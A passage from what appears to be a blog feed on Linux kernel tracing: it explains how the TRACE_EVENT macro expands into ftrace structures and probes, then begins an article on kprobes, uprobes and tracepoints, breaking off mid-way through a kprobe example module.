unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
{
unsigned int ret;
if (in_nmi()) /* not supported yet */
return 1;
preempt_disable();
...
ret = BPF_PROG_RUN_ARRAY_CHECK(call->prog_array, ctx, BPF_PROG_RUN);
out:
__this_cpu_dec(bpf_prog_active);
preempt_enable();
return ret;
}
include/linux/bpf.h
#define __BPF_PROG_RUN_ARRAY(array, ctx, func, check_non_null) \
({ \
struct bpf_prog **_prog, *__prog; \
struct bpf_prog_array *_array; \
u32 _ret = 1; \
rcu_read_lock(); \
_array = rcu_dereference(array); \
if (unlikely(check_non_null && !_array))\
goto _out; \
_prog = _array->progs; \
while ((__prog = READ_ONCE(*_prog))) { \
_ret &= func(__prog, ctx); \
_prog++; \
} \
_out: \
rcu_read_unlock(); \
_ret; \
})
#define BPF_PROG_RUN_ARRAY(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, false)
#define BPF_PROG_RUN_ARRAY_CHECK(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, true)
</code></pre></div></div>
Linux tracing - trace event framework2020-08-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework
<h3> Sample </h3>
<p>This post will show the trace event framework. The most important parts are the ‘TRACE_EVENT’ expansion and the connection between tracepoints and the ftrace tracer. As usual we will start our discussion with an example. This example is from <a href="https://lwn.net/Articles/383362/">Using the TRACE_EVENT() macro (Part 3)
</a>. There are three files, <a href="/assets/file/trace/sillymod.c">sillymod.c</a>, <a href="/assets/file/trace/silly-trace.h">silly-trace.h</a>, <a href="/assets/file/trace/Makefile">Makefile</a>.</p>
<p>Then we insmod the module and see the trace output.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/silly# insmod ./sillymod.ko
root@ubuntu:~/silly# cd /sys/kernel/debug/tracing/
root@ubuntu:/sys/kernel/debug/tracing# ls events/silly/
enable filter me_silly
root@ubuntu:/sys/kernel/debug/tracing# echo 1 > events/silly/enable
root@ubuntu:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 6/6 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
silly-thread-30460 [001] .... 178964.333898: me_silly: time=4339634000 count=22
silly-thread-30460 [001] .... 178965.358104: me_silly: time=4339634256 count=23
silly-thread-30460 [001] .... 178966.382349: me_silly: time=4339634512 count=24
silly-thread-30460 [001] .... 178967.405770: me_silly: time=4339634768 count=25
silly-thread-30460 [001] .... 178968.430004: me_silly: time=4339635024 count=26
silly-thread-30460 [001] .... 178969.453728: me_silly: time=4339635280 count=27
</code></pre></div></div>
<p>So most of the work we do ourselves is to write the ‘TRACE_EVENT’ MACRO; then we can use the ‘trace_me_silly’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
</code></pre></div></div>
<p>We will look at how this MACRO expands in the following sections.</p>
<h3> MACRO magic</h3>
<p>Before we go into the details of how ‘TRACE_EVENT’ works, let’s look at a small example, also from the LWN posts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DOGS { C(JACK_RUSSELL), C(BULL_TERRIER), C(ITALIAN_GREYHOUND) }
#undef C
#define C(a) ENUM_##a
enum dog_enums DOGS;
#undef C
#define C(a) #a
char *dog_strings[] = DOGS;
char *dog_to_string(enum dog_enums dog)
{
return dog_strings[dog];
}
</code></pre></div></div>
<p>The magic here is that we define the ‘C’ MACRO two times and change the ‘DOGS’ MACRO behavior.</p>
<p>The first definition of ‘C’ turns ‘DOGS’ into an enum. So we have this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum dog_enums {ENUM_JACK_RUSSELL, ENUM_BULL_TERRIER, ENUM_ITALIAN_GREYHOUND};
</code></pre></div></div>
<p>The second definition of ‘C’ turns ‘DOGS’ into a string array:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char *dog_strings = {"JACK_RUSSELL", "BULL_TERRIER", "ITALIAN_GREYHOUND"};
</code></pre></div></div>
<p>The ‘dog_to_string’ will return a string using the enum as index.</p>
<p>The key idea here is that we can generate different code from the same information. This is why we can use tracing by just defining one ‘TRACE_EVENT’ MACRO.</p>
<h3> TRACE_EVENT MACRO</h3>
<p>In the final part of my last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic">Linux tracing - kprobe, uprobe and tracepoint</a>, I discussed how a ‘tracepoint’ is declared and defined.
Now it’s time to see how it integrates with ftrace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef TRACE_SYSTEM
#define TRACE_SYSTEM silly
#if !defined(_SILLY_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
#define _SILLY_TRACE_H
#include <linux/tracepoint.h>
TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
#endif /* _SILLY_TRACE_H */
/* This part must be outside protection */
#undef TRACE_INCLUDE_PATH
#define TRACE_INCLUDE_PATH .
#define TRACE_INCLUDE_FILE silly-trace
#include <trace/define_trace.h>
</code></pre></div></div>
<p>First, the ‘defined(TRACE_HEADER_MULTI_READ)’ guard allows this file to be included several times.</p>
<h4> First definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> linux/tracepoint.h
#define TRACE_EVENT(name, proto, args, struct, assign, print) \
DECLARE_TRACE(name, PARAMS(proto), PARAMS(args))
</code></pre></div></div>
<p>Here ‘DECLARE_TRACE’ declare a tracepoint.</p>
<h4> Second definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#undef TRACE_EVENT
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DEFINE_TRACE(name)
</code></pre></div></div>
<p>Here ‘DEFINE_TRACE’ define a tracepoint.</p>
<p>‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ have been discussed in my last post. These two MACROs define a ‘struct tracepoint’ and several functions, and all of the ‘tracepoint’s are stored in the ‘__tracepoints’ section.</p>
<h4> Third definition of 'TRACE_EVENT' </h4>
<p>In trace/define_trace.h we will include trace/trace_events.h header file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#include <trace/trace_events.h>
</code></pre></div></div>
<p>At the beginning of the header file we see the ‘TRACE_EVENT’ definition as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/trace_events.h
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DECLARE_EVENT_CLASS(name, \
PARAMS(proto), \
PARAMS(args), \
PARAMS(tstruct), \
PARAMS(assign), \
PARAMS(print)); \
DEFINE_EVENT(name, name, PARAMS(proto), PARAMS(args));
</code></pre></div></div>
<p>In this header file, the sub-MACROs ‘DECLARE_EVENT_CLASS’ and ‘DEFINE_EVENT’ will be defined five times. This means ‘TRACE_EVENT’ will effectively be expanded five times.</p>
<p>So see the first definition(third in total) in this file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item) type item;
#undef __field_ext
#define __field_ext(type, item, filter_type) type item;
#undef __field_struct
#define __field_struct(type, item) type item;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) type item;
#undef __array
#define __array(type, item, len) type item[len];
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 __data_loc_##item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(char, item, -1)
#undef TP_STRUCT__entry
#define TP_STRUCT__entry(args...) args
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(name, proto, args, tstruct, assign, print) \
struct trace_event_raw_##name { \
struct trace_entry ent; \
tstruct \
char __data[0]; \
}; \
\
static struct trace_event_class event_class_##name;
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args) \
static struct trace_event_call __used \
__attribute__((__aligned__(4))) event_##name
</code></pre></div></div>
<p>‘DECLARE_EVENT_CLASS’ defines a ‘struct trace_event_raw_##name’; all of the data the tracer wants to record is defined in this struct. A data entry can be dynamic: the location information of the dynamic data is stored in ‘__data_loc_##item’ and the real data is stored in ‘__data[0]’.</p>
<h4> Fourth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
struct trace_event_data_offsets_##call { \
tstruct; \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args)
</code></pre></div></div>
<p>This one is simple: it just defines a ‘struct trace_event_data_offsets_##call’, which stores the dynamic data’s offsets.</p>
<h4> Fifth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry field
#undef TP_printk
#define TP_printk(fmt, args...) fmt "\n", args
#undef __get_dynamic_array
#define __get_dynamic_array(field) \
((void *)__entry + (__entry->__data_loc_##field & 0xffff))
#undef __get_dynamic_array_len
#define __get_dynamic_array_len(field) \
((__entry->__data_loc_##field >> 16) & 0xffff)
#undef __get_str
#define __get_str(field) ((char *)__get_dynamic_array(field))
#undef __get_bitmask
#define __get_bitmask(field) \
({ \
void *__bitmask = __get_dynamic_array(field); \
unsigned int __bitmask_size; \
__bitmask_size = __get_dynamic_array_len(field); \
trace_print_bitmask_seq(p, __bitmask, __bitmask_size); \
})
#undef __print_flags
#define __print_flags(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags __flags[] = \
{ flag_array, { -1, NULL }}; \
trace_print_flags_seq(p, delim, flag, __flags); \
})
#undef __print_symbolic
#define __print_symbolic(value, symbol_array...) \
({ \
static const struct trace_print_flags symbols[] = \
{ symbol_array, { -1, NULL }}; \
trace_print_symbols_seq(p, value, symbols); \
})
#undef __print_flags_u64
#undef __print_symbolic_u64
#if BITS_PER_LONG == 32
#define __print_flags_u64(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags_u64 __flags[] = \
{ flag_array, { -1, NULL } }; \
trace_print_flags_seq_u64(p, delim, flag, __flags); \
})
#define __print_symbolic_u64(value, symbol_array...) \
({ \
static const struct trace_print_flags_u64 symbols[] = \
{ symbol_array, { -1, NULL } }; \
trace_print_symbols_seq_u64(p, value, symbols); \
})
#else
#define __print_flags_u64(flag, delim, flag_array...) \
__print_flags(flag, delim, flag_array)
#define __print_symbolic_u64(value, symbol_array...) \
__print_symbolic(value, symbol_array)
#endif
#undef __print_hex
#define __print_hex(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, false)
#undef __print_hex_str
#define __print_hex_str(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, true)
#undef __print_array
#define __print_array(array, count, el_size) \
({ \
BUILD_BUG_ON(el_size != 1 && el_size != 2 && \
el_size != 4 && el_size != 8); \
trace_print_array_seq(p, array, count, el_size); \
})
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace enum print_line_t \
trace_raw_output_##call(struct trace_iterator *iter, int flags, \
struct trace_event *trace_event) \
{ \
struct trace_seq *s = &iter->seq; \
struct trace_seq __maybe_unused *p = &iter->tmp_seq; \
struct trace_event_raw_##call *field; \
int ret; \
\
field = (typeof(field))iter->ent; \
\
ret = trace_raw_output_prep(iter, trace_event); \
if (ret != TRACE_TYPE_HANDLED) \
return ret; \
\
trace_seq_printf(s, print); \
\
return trace_handle_return(s); \
} \
static struct trace_event_functions trace_event_type_funcs_##call = { \
.trace = trace_raw_output_##call, \
};
</code></pre></div></div>
<p>Here a ‘trace_raw_output_##call’ function is defined; it is used to print the raw event data (in the ring buffer) to the tracer’s output buffer. The raw data is stored in ‘iter->ent’. A ‘struct trace_event_functions’ named ‘trace_event_type_funcs_##call’ is also defined. The special ‘print’ helpers (__print_flags, __print_symbolic and so on) are handled here as well.</p>
<h4> Sixth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field_ext
#define __field_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), filter_type); \
if (ret) \
return ret;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
0, filter_type); \
if (ret) \
return ret;
#undef __field
#define __field(type, item) __field_ext(type, item, FILTER_OTHER)
#undef __field_struct
#define __field_struct(type, item) __field_struct_ext(type, item, FILTER_OTHER)
#undef __array
#define __array(type, item, len) \
do { \
char *type_str = #type"["__stringify(len)"]"; \
BUILD_BUG_ON(len > MAX_FILTER_STR_VAL); \
ret = trace_define_field(event_call, type_str, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), FILTER_OTHER); \
if (ret) \
return ret; \
} while (0);
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
ret = trace_define_field(event_call, "__data_loc " #type "[]", #item, \
offsetof(typeof(field), __data_loc_##item), \
sizeof(field.__data_loc_##item), \
is_signed_type(type), FILTER_OTHER);
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, func, print) \
static int notrace __init \
trace_event_define_fields_##call(struct trace_event_call *event_call) \
{ \
struct trace_event_raw_##call field; \
int ret; \
\
tstruct; \
\
return ret; \
}
</code></pre></div></div>
<p>Here we define the function ‘trace_event_define_fields_##call’. It calls ‘trace_define_field’ for every member in ‘TP_STRUCT__entry’. ‘trace_define_field’ inserts the field information into the ‘event_call->class->fields’ linked list, which is used by the ftrace framework.</p>
<h4> Seventh definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__item_length = (len) * sizeof(type); \
__data_offsets->item = __data_size + \
offsetof(typeof(*entry), __data); \
__data_offsets->item |= __item_length << 16; \
__data_size += __item_length;
#undef __string
#define __string(item, src) __dynamic_array(char, item, \
strlen((src) ? (const char *)(src) : "(null)") + 1)
/*
* __bitmask_size_in_bytes_raw is the number of bytes needed to hold
* num_possible_cpus().
*/
#define __bitmask_size_in_bytes_raw(nr_bits) \
(((nr_bits) + 7) / 8)
#define __bitmask_size_in_longs(nr_bits) \
((__bitmask_size_in_bytes_raw(nr_bits) + \
((BITS_PER_LONG / 8) - 1)) / (BITS_PER_LONG / 8))
/*
* __bitmask_size_in_bytes is the number of bytes needed to hold
* num_possible_cpus() padded out to the nearest long. This is what
* is saved in the buffer, just to be consistent.
*/
#define __bitmask_size_in_bytes(nr_bits) \
(__bitmask_size_in_longs(nr_bits) * (BITS_PER_LONG / 8))
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, \
__bitmask_size_in_longs(nr_bits))
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static inline notrace int trace_event_get_offsets_##call( \
struct trace_event_data_offsets_##call *__data_offsets, proto) \
{ \
int __data_size = 0; \
int __maybe_unused __item_length; \
struct trace_event_raw_##call __maybe_unused *entry; \
\
tstruct; \
\
return __data_size; \
}
</code></pre></div></div>
<p>This time a function ‘trace_event_get_offsets_##call’ is defined; it calculates the length and offset of every dynamic member in ‘TP_STRUCT__entry’. The result is stored in the ‘struct trace_event_data_offsets_##call’ defined in the fourth-round expansion.</p>
<h4> Eighth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_struct
#define __field_struct(type, item)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__entry->__data_loc_##item = __data_offsets.item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __assign_str
#define __assign_str(dst, src) \
strcpy(__get_str(dst), (src) ? (const char *)(src) : "(null)");
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef __get_bitmask
#define __get_bitmask(field) (char *)__get_dynamic_array(field)
#undef __assign_bitmask
#define __assign_bitmask(dst, src, nr_bits) \
memcpy(__get_bitmask(dst), (src), __bitmask_size_in_bytes(nr_bits))
#undef TP_fast_assign
#define TP_fast_assign(args...) args
#undef __perf_count
#define __perf_count(c) (c)
#undef __perf_task
#define __perf_task(t) (t)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
\
static notrace void \
trace_event_raw_event_##call(void *__data, proto) \
{ \
struct trace_event_file *trace_file = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_buffer fbuffer; \
struct trace_event_raw_##call *entry; \
int __data_size; \
\
if (trace_trigger_soft_disabled(trace_file)) \
return; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
entry = trace_event_buffer_reserve(&fbuffer, trace_file, \
sizeof(*entry) + __data_size); \
\
if (!entry) \
return; \
\
tstruct \
\
{ assign; } \
\
trace_event_buffer_commit(&fbuffer); \
}
</code></pre></div></div>
<p>Here the function ‘trace_event_raw_event_##call’ is defined. It calls ‘trace_trigger_soft_disabled’ to decide whether to record data, then ‘trace_event_get_offsets_##call’ to calculate the dynamic data’s offsets and total size. It calls ‘trace_event_buffer_reserve’ to reserve space in the ring buffer. The ‘tstruct’ part assigns ‘__entry->__data_loc_##item’, and finally the entry is committed to the ring buffer by ‘trace_event_buffer_commit’.</p>
<h4> Ninth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry REC
#undef __print_flags
#undef __print_symbolic
#undef __print_hex
#undef __print_hex_str
#undef __get_dynamic_array
#undef __get_dynamic_array_len
#undef __get_str
#undef __get_bitmask
#undef __print_array
#undef TP_printk
#define TP_printk(fmt, args...) "\"" fmt "\", " __stringify(args)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
_TRACE_PERF_PROTO(call, PARAMS(proto)); \
static char print_fmt_##call[] = print; \
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, call, proto, args) \
\
static struct trace_event_call __used event_##call = { \
.class = &event_class_##template, \
{ \
.tp = &__tracepoint_##call, \
}, \
.event.funcs = &trace_event_type_funcs_##template, \
.print_fmt = print_fmt_##template, \
.flags = TRACE_EVENT_FL_TRACEPOINT, \
}; \
static struct trace_event_call __used \
__attribute__((section("_ftrace_events"))) *__event_##call = &event_##call
</code></pre></div></div>
<p>Here a ‘struct trace_event_class’ named ‘event_class_##call’ and a ‘struct trace_event_call’ named ‘event_##call’ are defined. The probe of the class is ‘trace_event_raw_event_##call’, which was defined in the eighth-round expansion. All of the ‘event_##call’ pointers are placed in the ‘_ftrace_events’ section.</p>
<p>This is the story of ‘TRACE_EVENT’: a whole flurry of operations, fierce as a tiger (一顿操作猛如虎). Let’s summarize what we have done so far.</p>
<p><img src="/assets/img/trace/1.png" alt="" /></p>
<p>In ‘TRACE_EVENT’ we have defined a ‘trace_event_call’ and some related functions and structures. The most important is the ‘trace_event_class’s probe function ‘trace_event_raw_event_##call’. When code calls the trace function (trace_me_silly for example), it invokes the ‘tracepoint’s funcs, i.e. the ‘probe’ function. The probe function ‘trace_event_raw_event_##call’ reserves a ring buffer entry, fills in the data and commits the buffer; later, ‘trace_raw_output_##call’ copies the ring buffer data to the output buffer. Next let’s see how this happens.</p>
<h3> trace event init </h3>
<p>The ftrace framework is another complicated thing, so here let’s just focus on the trace event part.</p>
<p>Some of the important functions in the trace event init process are the following:</p>
<p>start_kernel()
->early_trace_init()
->trace_init()
->event_trace_enable()
->event_init()
->__trace_early_add_events()
->__trace_early_add_new_event()
->trace_create_new_event()</p>
<p>In event_trace_enable(), it iterates over the ‘_ftrace_events’ section. For every ‘trace_event_call’, it calls ‘event_init’, which invokes ‘call->class->raw_init()’; this is trace_event_raw_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int event_init(struct trace_event_call *call)
{
int ret = 0;
const char *name;
name = trace_event_name(call);
if (WARN_ON(!name))
return -EINVAL;
if (call->class->raw_init) {
ret = call->class->raw_init(call);
if (ret < 0 && ret != -ENOSYS)
pr_warn("Could not initialize trace events/%s\n", name);
}
return ret;
}
</code></pre></div></div>
<p>trace_event_raw_init calls register_trace_event, which initializes the ‘trace_event’ member named ‘event’ in ‘trace_event_call’ and inserts the ‘trace_event’ into a global ‘event_hash’ hash table.</p>
<p>event_trace_enable also inserts the ‘trace_event_call’ into the global ‘ftrace_events’ linked list.</p>
<p>In ‘__trace_early_add_events’s call chain, a ‘trace_event_file’ is created for every ‘trace_event_call’ (by ‘trace_create_new_event’).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct trace_event_file *
trace_create_new_event(struct trace_event_call *call,
struct trace_array *tr)
{
struct trace_event_file *file;
file = kmem_cache_alloc(file_cachep, GFP_TRACE);
if (!file)
return NULL;
file->event_call = call;
file->tr = tr;
atomic_set(&file->sm_ref, 0);
atomic_set(&file->tm_ref, 0);
INIT_LIST_HEAD(&file->triggers);
list_add(&file->list, &tr->events);
return file;
}
</code></pre></div></div>
<p>Later, in fs_initcall(event_trace_init), the directories and files for the events are created.
event_trace_init()
->early_event_add_tracer()
->__trace_early_add_event_dirs()
->event_create_dir()</p>
<p>In the final ‘event_create_dir’ function, we create the directory and files. It may also create a subsystem directory.</p>
<h3>enable trace event </h3>
<p>When we write to the ‘enable’ file, ‘event_enable_write’ handles it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (call->class->reg && !(call->flags & TRACE_EVENT_FL_IGNORE_ENABLE))
trace_create_file("enable", 0644, file->dir, file,
&ftrace_enable_fops);
static const struct file_operations ftrace_enable_fops = {
.open = tracing_open_generic,
.read = event_enable_read,
.write = event_enable_write,
.llseek = default_llseek,
};
static ssize_t
event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
loff_t *ppos)
{
struct trace_event_file *file;
unsigned long val;
int ret;
ret = kstrtoul_from_user(ubuf, cnt, 10, &val);
if (ret)
return ret;
ret = tracing_update_buffers();
if (ret < 0)
return ret;
switch (val) {
case 0:
case 1:
ret = -ENODEV;
mutex_lock(&event_mutex);
file = event_file_data(filp);
if (likely(file))
ret = ftrace_event_enable_disable(file, val);
mutex_unlock(&event_mutex);
break;
default:
return -EINVAL;
}
*ppos += cnt;
return ret ? ret : cnt;
}
</code></pre></div></div>
<p>After the call chain ftrace_event_enable_disable->__ftrace_event_enable_disable->call->class->reg, the ‘trace_event_class’s reg callback is called. This is ‘trace_event_reg’. ‘call->class->probe’ is ‘trace_event_raw_event_##call’. After a long call chain, ‘trace_event_raw_event_##call’ is added to the ‘tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
...
return 0;
}
</code></pre></div></div>
<p>‘tracepoint_probe_register’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int tracepoint_probe_register(struct tracepoint *tp, void *probe, void *data)
{
return tracepoint_probe_register_prio(tp, probe, data, TRACEPOINT_DEFAULT_PRIO);
}
int tracepoint_probe_register_prio(struct tracepoint *tp, void *probe,
void *data, int prio)
{
struct tracepoint_func tp_func;
int ret;
mutex_lock(&tracepoints_mutex);
tp_func.func = probe;
tp_func.data = data;
tp_func.prio = prio;
ret = tracepoint_add_func(tp, &tp_func, prio);
mutex_unlock(&tracepoints_mutex);
return ret;
}
static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
Linux tracing - kprobe, uprobe and tracepoint2020-08-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic
<h3> Background </h3>
<p>The Linux tracing system is confusing, as tracing has many faces. There is a lot of terminology around tracing, such as ftrace, kprobes, uprobes and trace events.</p>
<p>Julia Evans has written a blog <a href="https://jvns.ca/blog/2017/07/05/linux-tracing-systems/#ftrace">Linux tracing systems & how they fit together</a> to clarify these by splitting linux tracing systems into data sources (where the tracing data comes from), mechanisms for collecting data for those sources (like “ftrace”) and tracing frontends (the tool you actually interact with to collect/analyse data).</p>
<p>In this post, I will summarize the mechanisms of the data sources. From Steven Rostedt’s slides <a href="https://static.sched.com/hosted_files/osseu19/5f/unified-tracing-platform-oss-eu-2019.pdf">Unified Tracing Platform</a>, the event tracing basics are kprobes, uprobes and tracepoints.</p>
<p>I will give one example of each data source and summarize how each mechanism works in the Linux kernel.</p>
<h3> kprobe </h3>
<h4> kprobe usage </h4>
<p>Following is a raw usage of kprobe, slightly adjusted from samples/kprobes/kprobe_example.c in the kernel tree:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#define MAX_SYMBOL_LEN 64
static char symbol[MAX_SYMBOL_LEN] = "_do_fork";
module_param_string(symbol, symbol, sizeof(symbol), 0644);
/* For each probe you need to allocate a kprobe structure */
static struct kprobe kp = {
.symbol_name = symbol,
};
/* kprobe pre_handler: called just before the probed instruction is executed */
static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
pr_info("<%s> pre_handler: name = %s, p->addr = 0x%p, ip = %lx, flags = 0x%lx\n",
p->symbol_name, current->comm, p->addr, regs->ip, regs->flags);
return 0;
}
/* kprobe post_handler: called after the probed instruction is executed */
static void handler_post(struct kprobe *p, struct pt_regs *regs,
unsigned long flags)
{
pr_info("<%s> post_handler: p->addr = 0x%p, flags = 0x%lx\n",
p->symbol_name, p->addr, regs->flags);
}
/*
* fault_handler: this is called if an exception is generated for any
* instruction within the pre- or post-handler, or when Kprobes
* single-steps the probed instruction.
*/
static int handler_fault(struct kprobe *p, struct pt_regs *regs, int trapnr)
{
pr_info("fault_handler: p->addr = 0x%p, trap #%d\n", p->addr, trapnr);
/* Return 0 because we don't handle the fault. */
return 0;
}
static int __init kprobe_init(void)
{
int ret;
kp.pre_handler = handler_pre;
kp.post_handler = handler_post;
kp.fault_handler = handler_fault;
ret = register_kprobe(&kp);
if (ret < 0) {
